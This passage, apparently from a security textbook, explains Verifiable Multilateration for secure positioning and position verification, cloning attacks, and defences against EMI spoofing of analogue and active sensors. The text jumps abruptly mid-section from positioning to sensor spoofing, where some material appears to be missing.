outside of the triangle/pyramid, causing the prover and the verifiers to reject the computed
position. Namely, the verifiers and the prover only accept the positions that are within the area
of coverage, defined as the area covered by the verification triangles/pyramids. Given this,
when the prover is trusted, Verifiable Multilateration is resilient to all forms of spoofing by the
attacker. Additional care needs to be given to the management of errors and the computation
of the position when distance measurement errors are taken into account.
When used for position verification, Verifiable Multilateration is run with an untrusted prover.
Each verifier runs a distance-fraud resilient distance bounding protocol with the prover. Based
on the obtained distance bounds, the verifiers compute the provers’ position. If this position
(within some distance and position error bounds) falls within the verification triangle/pyramid,
the verifiers accept it as valid. Given that the prover is untrusted, it can enlarge any of the
measured distances, but cannot reduce them since this is prevented by the use of distance
bounding protocols. Like in the case of secure positioning, the geometry of the triangle/pyramid
then prevents the prover from claiming a false position. Unlike in the case of secure positioning,
position verification is vulnerable to cloning attacks, in which the prover shares its key to its
clones. These clones can then be strategically placed to the verifiers and fake any position
by enlarging distances to each individual verifier. This attack can be possibly addressed by
tamper resistant hardware or device fingerprinting.
Another approach to secure positioning and position verification is to prevent the attacker
from deterministically spoofing the computed position by making the positions of the verifiers
unpredictable for the attacker (either a malicious prover or an external attacker). Verifier
positions can therefore be hidden or the verifiers can be mobile. When the verifiers are hidden
they should only listen to the beacons sent by the nodes to not disclose their positions. Upon
receiving the beacons, the base stations compute the nodes location with TDOA and check if
this location is consistent with the time differences.
predict. As a result, unintentional and especially intentional EMI targeted at analogue sensors
can pose a realistic threat to any system that relies on readings obtained from an affected
sensor.
EMI has been used to manipulate the output of medical devices as well as to compromise
ultrasonic ranging systems. Research has shown that consumer electronic devices equipped
with microphones are especially vulnerable to the injection of fabricated audio signals [1999].
Ultrasonic signals were used to inject silent voice commands, and acoustic waves were used
to affect the output of MEMS accelerometers. Accelerometers and intertial systems based
on MEMS are, for instance, used extensively in (consumer-grade) drones and multi-copters.
Undoubtedly, sensor spoofing attacks have gained a lot of attention and will likely impact
many future cyber-physical devices. System designers therefore have to take great care
and protect analogue sensors from adversarial input as an attacker might trigger a critical
decision on the application layer of such a device by exposing it to intentional EMI. Potential
defence strategies include, for example, (analogue) shielding of the devices, measuring signal
contamination using various metrics, or accommodating dedicated EMI monitors to detect
and flag suspicious sensor readings.
A promising strategy that follows the approach of quantifying signal contamination to detect
EMI sensor spoofing is presented in [2193]. The sensor output can be turned on and off
according to a pattern unknown to the attacker. Adversarial EMI in the wires between sensor
and the circuitry converting the reading to a digital value, i.e., the ADC, can be detected
during the times the sensor is off since the sensor output should be at a known level. In case
there are fluctuations in the readings, an attack is detected. Such an approach is thought
to be especially effective when used to protect powered or non-powered passive sensors.
It has been demonstrated to successfully thwart EMI attacks against a microphone and a
temperature sensor system. The only modification required is the addition of an electronic
switch that can be operated by the control unit or microcontroller to turn the sensor on and off.
A similar sensor spoofing detection scheme can be implemented for active sensors, such as
ultrasonic and infrared sensors, by incorporating a challenge-response like mechanism into
the measurement acquisition process [2195]. An active sensor often has an emitting element
and a receiving element. The emitter releases a signal that is reflected and captured by the
receiver. Based on the properties of the received signal, the sensor can infer information about
the entity or the object that reflected the signal. The emitter can be turned off randomly and
during that time the receiver should not be able to register any incoming signal. Otherwise, an
attack is detected and the sensor reading is discarded.